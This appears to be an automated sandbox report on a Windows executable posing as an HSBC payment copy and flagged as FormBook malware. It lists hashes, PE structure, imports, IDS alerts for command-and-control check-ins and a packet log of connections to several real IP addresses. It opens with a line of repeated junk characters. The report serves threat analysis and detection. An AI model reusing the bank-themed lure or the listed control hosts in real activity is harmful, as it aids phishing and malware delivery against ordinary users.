M2W2S,.1JQ#84J.6E5VW2SXN5JQ384JD2e5F72SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.158998559059728
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rHSBCBank_Paymentswiftcpy.exe
File size:	1'179'648 bytes
MD5:	6ba55b78696072ea7f7f56c955fe1c0b
SHA1:	7f061f071b237e9defd98fbfdea99caebe97960d
SHA256:	8771179cb6f0488244c65cdfab07668bfaea4d0b28a77ee94879448662fde67e
SHA512:	4e498f3a5b56bc50d814b911adcb49c1edef3b7d236ed0d4a87ac79faa27a83abfe6c2a0fb1580f02ee873b74105aae2e2a85119785244f0e586cb18fceb99bf
SSDEEP:	24576:Vu6J33O0c+JY5UZ+XC0kGso6FaDaEJaWntGitRmRvH4/T5upWY:3u0c++OCvkGs9FaDBvGiDU8VDY
TLSH:	5745CF2273DDC360CB669173BF2AB7016EBF3C614630B95B2F980D7DA960161162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67170475 [Tue Oct 22 01:48:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FCDC0F6D5EAh
jmp 00007FCDC0F603B4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FCDC0F6053Ah
cmp edi, eax
jc 00007FCDC0F6089Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FCDC0F60539h
rep movsb
jmp 00007FCDC0F6084Ch
cmp ecx, 00000080h
jc 00007FCDC0F60704h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FCDC0F60540h
bt dword ptr [004BE324h], 01h
jc 00007FCDC0F60A10h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FCDC0F606DDh
test edi, 00000003h
jne 00007FCDC0F606EEh
test esi, 00000003h
jne 00007FCDC0F606CDh
bt edi, 02h
jnc 00007FCDC0F6053Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FCDC0F60543h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FCDC0F60595h
bt esi, 03h
jnc 00007FCDC0F605E8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x576a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11f000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x576a0	0x57800	3869490ae3a964afe8bd1628566a7b5d	False	0.92431640625	data	7.888049955318111	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11f000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x4e965	data			1.000329301973016
RT_GROUP_ICON	0x11e120	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11e198	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11e1ac	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11e1c0	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11e1d4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11e2b0	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-22T05:38:36.187115+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49868	208.91.197.27	80	TCP
2024-10-22T05:39:08.255197+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49975	198.44.251.203	80	TCP
2024-10-22T05:39:21.895109+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49980	81.2.196.19	80	TCP
2024-10-22T05:39:35.613850+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49984	195.110.124.133	80	TCP
2024-10-22T05:39:49.438369+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49988	54.67.87.110	80	TCP
2024-10-22T05:40:07.806885+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49992	199.59.243.227	80	TCP
2024-10-22T05:40:21.217859+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49996	162.213.249.216	80	TCP
2024-10-22T05:40:36.679327+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	50000	221.121.144.149	80	TCP
2024-10-22T05:40:50.204838+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	50004	199.59.243.227	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 22, 2024 05:38:34.419610023 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:34.425115108 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:34.425302029 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:34.431626081 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:34.437235117 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.186935902 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.186949015 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.186959982 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.186992884 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.187114954 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.187145948 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.194205999 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.194216013 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.194334030 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.194470882 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.194482088 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.194490910 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.194544077 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.201793909 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.201805115 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.202006102 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.202035904 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.202044964 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.202059984 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.202080011 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.202256918 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.202258110 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.210387945 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.210397959 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.210412979 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.210421085 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.210479021 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.210508108 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.304172993 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.304189920 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.304197073 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.304203987 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.304447889 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.311741114 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.311925888 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.311938047 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.312103987 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.319585085 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.319593906 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.319603920 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.319745064 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.319745064 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.327796936 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.327806950 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.327816010 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.327936888 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.368921041 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.368953943 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.368979931 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.369034052 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.369044065 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.369082928 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.421406984 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.421418905 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.421533108 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.429048061 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.429061890 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.429071903 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.429122925 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.436589003 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.436602116 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.436611891 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.436737061 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.445074081 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.445178986 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.445192099 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.445240021 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.486547947 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.486567974 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.486578941 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.486639977 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.486659050 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:36.486715078 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.486738920 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.489392042 CEST	49868	80	192.168.2.6	208.91.197.27
Oct 22, 2024 05:38:36.494877100 CEST	80	49868	208.91.197.27	192.168.2.6
Oct 22, 2024 05:38:52.126688957 CEST	49962	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:52.132175922 CEST	80	49962	198.44.251.203	192.168.2.6
Oct 22, 2024 05:38:52.132374048 CEST	49962	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:52.140813112 CEST	49962	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:52.146127939 CEST	80	49962	198.44.251.203	192.168.2.6
Oct 22, 2024 05:38:53.645212889 CEST	49962	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:53.691592932 CEST	80	49962	198.44.251.203	192.168.2.6
Oct 22, 2024 05:38:54.665055037 CEST	49973	80	192.168.2.6	198.44.251.203
Oct 22, 2024 05:38:54.670562029 CEST	80	49973	198.44.251.203	192.168.2.6
